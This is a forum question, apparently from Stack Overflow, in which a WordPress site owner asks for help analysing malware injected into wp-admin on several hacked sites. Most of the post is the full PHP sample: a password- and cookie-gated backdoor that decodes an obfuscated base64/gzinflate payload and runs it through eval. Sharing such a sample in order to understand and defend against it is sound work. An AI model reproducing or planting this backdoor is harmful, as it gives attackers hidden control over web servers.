# Need to identify malicious code in hacked Wordpress site so I can stop other sites getting hacked

Tags: php, wordpress, base64, eval, malware

Many of my Wordpress sites have been hacked with a very similar bit of code.

A single malicious file gets injected into the wp-admin folder with a path like
wp-admin/.1e9732/4f085115.php

The php code is below. I'd be grateful if someone can help me identify anything about the code so that I can work out what it is and how it's getting in. I only use well-trusted plugins and everything is up to date. Wordfence identifys the files correctly but doesn't seem to protect against them. The sites are all on separate clusters of shared hosting, so I can't really blame another site on the hosting.

Any help greately appreciated as it's costing me huge amounts of time to stay on top of it, and I can't afford to migrate all my sites elsewhere!
Thanks

PHP:

````
if (md5($_SERVER['HTTP_USER_AGENT'])<> 'fdf0d4c6e5aff827d0af31f5932ede1a' ) {
    echo "Bad Request"; exit;
}
$hostname = str_replace("www.","",strtolower($_SERVER['HTTP_HOST']));
$cookie_host = $hostname;
if (   ($_REQUEST['GV_z']) && (md5($_REQUEST['GV_z']) == '54770f485d7e90b74ae7b6f39fb54aba')   ) {
        setcookie('engine_ssl_https' , $_REQUEST['GV_z'] , time() + 86400 * 30 * 12 , '/' , '.' . $cookie_host);
        header('Location: ' .$_SERVER["HTTP_REFERER"]);
}
if (   (!isset($_COOKIE['engine_ssl_https'])) || (md5($_COOKIE['engine_ssl_https'])<>'54770f485d7e90b74ae7b6f39fb54aba')   ) {
    echo '<form method="post" action=""><input type="text" name="GV_z" value=""><input type="submit" value="&gt;"></form>';
    exit;
}
function WkKig($bIzRMB) {
    $bIzRMB=gzinflate(base64_decode($bIzRMB));
    for($i=0;$i<strlen($bIzRMB);$i++)  {
        $bIzRMB[$i] = chr(ord($bIzRMB[$i])-1);
    } return $bIzRMB;
}
eval(WkKig("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